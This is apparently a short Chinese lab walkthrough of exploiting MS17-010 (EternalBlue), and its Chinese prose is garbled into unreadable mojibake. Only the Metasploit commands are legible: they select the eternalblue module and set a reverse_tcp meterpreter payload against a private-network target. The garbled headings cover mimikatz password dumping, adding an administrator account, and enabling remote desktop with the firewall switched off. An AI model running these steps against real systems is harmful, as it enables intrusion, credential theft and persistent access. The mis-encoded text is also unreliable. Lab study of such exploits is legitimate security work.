1.MS17-010 ©¶´ÀûÓÃ

1.MS17-010 ©¶´ÀûÓÃ

1.1 MS17-010˵Ã÷

1.2 ²âÊÔ¹ý³Ì

1£©É¨Ãè

ʹÓÃNessusɨÃèÖ÷»ú192.168.223.134£¬·¢ÏÖÒÔÏ©¶´£º

2£©Â©¶´ÀûÓÃ

¹¥»÷¶ÔÏó£º192.168.223.134£¬kali£º192.168.223.135

£¨1£©½øÈëMSF¿ò¼Ü

£¨2£©²éѯ©¶´Ä£¿é²¢Ê¹ÓÃ

search ms17_010

use exploit/windows/smb/ms17_010_eternalblue

show payloads

£¨3£©ÅäÖù¥»÷ÔغÉ

set payload windows/x64/meterpreter/reverse_tcp

set rhost 192.168.223.134

set lhost 192.168.223.135

show options

£¨4£©·¢Æð¹¥»÷

£¨5£©½ØͼÓë»ñÈ¡shell

£¨6£©»ñȡϵͳ¹ÜÀíÃÜÂë

µÚÒ»ÖÖ£ºÔØÈëmimikatz£¬Ê¹ÓÃÃüÁîwdigest»ñÈ¡ÃÜÂë¡£

µÚ¶þÖÖ£ºÌí¼Ó¹ÜÀíÔ±ÕË»§¡£

£¨7£©¿ªÆôÔ¶³Ì×ÀÃæ

´ËÃüÁî¿ÉÒÔ¿ªÆôÔ¶³Ì×ÀÃ棬²¢¹Ø±Õ·À»ðǽ¡£

£¨8£©Ô¶³Ì×ÀÃæÁ¬½Ó

Áí¿ªÆôÒ»¸öÖնˣ¬Ê¹ÓÃrdesktop Á¬½ÓÔ¶³Ì×ÀÃæ ¡£